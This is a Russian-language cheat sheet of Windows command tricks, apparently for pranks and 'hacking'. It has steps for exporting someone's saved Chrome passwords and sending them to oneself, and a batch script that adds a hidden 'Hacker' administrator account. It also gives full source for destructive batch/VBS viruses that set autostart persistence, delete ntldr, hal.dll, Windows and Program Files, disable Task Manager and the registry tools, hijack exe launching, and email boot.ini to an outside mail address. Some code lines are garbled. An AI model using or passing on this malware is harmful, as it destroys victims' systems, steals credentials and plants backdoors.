//---------------------------------Как узнать айпи сайта----------------------//
1. Открываем cmd
2. пишем "color a" потом "ping (сайт)"
//---------------------------------------------------------------------------//
Вырубаем себе пк или другом ток по локалке
shutdown /s /t 60 /f /L /m \\имя компьютера - выключить соседний компьютер.
Shutdown.exe -s -t 60 - выключить свой компьютер.
//---------------------------------------------------------------------------//
Создаем папку пишем не заходить!
Создаем файл bat и пишем туда код
@echo off
Shutdown.exe -s -t 60
cls
msg * Push "Ok"
//----------------------------------------------------------------------------//
Крадём пароли с разных сайтов
chrome://settings/passwords
Нажимаем 3 точки и экспорт формат экспорта txt и кидаем быстро себе на пк через DIscord, Skype, Viber и другие где можно передовать файлы
//----------------------------------------------------------------------------//
Проверка инета своего
открываем кмд и
ping 8.8.8.8 -t
//-------------------------------------------------------------------------------//
Программа шутка типо удаление виндовса))
Открываем блокнот и вставляем этот код
msgbox"Привет",16,"Привет"
msgbox"Ты не против, если я буду жить у тебя в компе?",32+4,"Вопрос"
msgbox"Ок, ты не против",64,"Я понял"
msgbox"Windows удалить?",32+4,"Вопрос"
msgbox"Ок, ты не против",64,"Я понял"
msgbox"Удаляю...",64,"ОК "
msgbox"Это шутка, это НЕ вирус
ХАХАХАХА",64,"Я пошутил"
msgbox"Или же нет...",64,"..."
//--------------------------------------------------------------------------------//
Добавляет пользователя Hacker с паролем hacker c возможнастью измены пароля и имени вот код
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user Hacker hacker /add
net localgroup Администраторы Hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
//----------------------------------------------------------------------------------//
Шутка для переименовывания и смены даты на пк без формата дисков
@echo off
label C:Царство Виндовса!
label Z:Файли и порнография =)
label D:Файли и порнография =)
label E:Файли и порнография =)
data 14.04.1896 //меняет дату
time 04:44
del "%0"
//-----------------------------------------------------------------------------------//
Вирус-шутка запугает что винде конец и перезапустит комп!
@echo off
chcp 1251
@echo Привет!
@echo Добро пожаловать читер твоему пк пиздааа
@echo Нажми кнопку чтобы продолжить удаление
@echo Ты читер и твоему пк пизда всё сейчас будет формат винды
@echo И погнали ломать винду!
pause
shutdown -r -t 1 -c "lol" >nul
pause
//------------------------------------------------------------------------------------//
Если вы хотите сломать винду то вот код
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") » %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")»%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:\ntldr",1 » %temp%\temp.vbs
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:\Windows",1 » %temp%\temp.vbs
echo fso.deletefolder "I:\Windows",1 » %temp%\temp.vbs
echo fso.deletefolder "C:\Windows",1 » %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") » %temp%\temp.vbs
echo fso.deletefile sr+"\system32\hal.dll",1 » %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") » %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\dllcache",1 » %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") » %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\drives",1 » %temp%\temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™"»%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™"»%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™"»%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")»%temp%\temp1.vbs
echo do»%temp%\temp1.vbs
echo fso.getfile ("A:\")»%temp%\temp1.vbs
echo loop»%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject("Wscript.Shell") » %temp%\temp2.vbs
echo do»%temp%\temp2.vbs
echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True"»%temp%\temp2.vbs
echo loop»%temp%\temp2.vbs
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject("shell.application")»%temp%\temp.vbs
echo application.minimizeall»%temp%\temp.vbs
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
echo i=50 » %temp%\temp.vbs
echo while i^>0 or i^= 1 then » %temp%\temp.vbs
echo For i = 0 to colCDROMs.Count - 1 » %temp%\temp.vbs
echo colCDROMs.Item(i).eject » %temp%\temp.vbs
echo next » %temp%\temp.vbs
echo End If » %temp%\temp.vbs
echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") » %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) » %temp%\temp.vbs
echo Set iMsg = CreateObject("CDO.Message") » %temp%\temp.vbs
echo Set iConf = CreateObject("CDO.Configuration") » %temp%\temp.vbs
echo Set Flds = iConf.Fields » %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendus..") = 2 » %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpau..") = 1 » %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendus..") = "support" » %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpa..") = "support" » %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpse..") = "smtp.mail.ru" » %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpse..") = 25 » %temp%\temp.vbs
echo Flds.Update » %temp%\temp.vbs
echo iMsg.Configuration = iConf » %temp%\temp.vbs
echo iMsg.To = strTo » %temp%\temp.vbs
echo iMsg.From = strFrom » %temp%\temp.vbs
echo iMsg.Subject = strSubject » %temp%\temp.vbs
echo iMsg.TextBody = strBody » %temp%\temp.vbs
echo iMsg.AddAttachment "c:\boot.ini" » %temp%\temp.vbs
echo iMsg.Send » %temp%\temp.vbs
echo End Function » %temp%\temp.vbs
echo Set iMsg = Nothing » %temp%\temp.vbs
echo Set iConf = Nothing » %temp%\temp.vbs
echo Set Flds = Nothing » %temp%\temp.vbs
echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 » %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
//-------------------------------------------------------------------------------------------------//
Удаление файлов и так далее нужно всё писать без скобок и убирать слова с скобок
@Echo off (Запрещаем вывод на экран исполняемых команд)
Echo Hacked for HeltezzYT (выводит на экран надпись "Hacked for HeltezzYT" вместно нее можете написать все что угодно)
Date 06.06.06 (меняет дату можете поставить свою)
if exist c:hackerheltezz.bat goto abc (проверяет существует ли фаил, ...)
copy %0 c:hackerheltezz.bat (копирует вирус меняя названия)
Attir +h c:hackerheltezz.bat ( дает фаилу "hackerheltezz.bat " атрибут скрытый)
Echo c:hackerheltezz.bat>>autoexec.bat (прописывает фаил "hackerheltezz.bat " в автозагрузку)
:abc (если он существует то программа перейдет на метку :abc)
далее идет команда которые создают пустые папки название папок можете изменить
md HACKED
md FOR
md YOUTUBE
md Channel
md Heltezz
Label C: Hacked For Heltezz ( диск Е будет называтся "Hacked For Heltezz")
assoc.exe=.mp3 (запускает все exe фаилы как музыка)(и ломает все файлы опасно запускать на своём пк)
del c:Program Files/q (удаляет все фаилы из папки Program Files папку можно поменять)
Echo Hacked for HeltezzYT (выводит надпись)
//-----------------------------------------------------------------------------------------------------//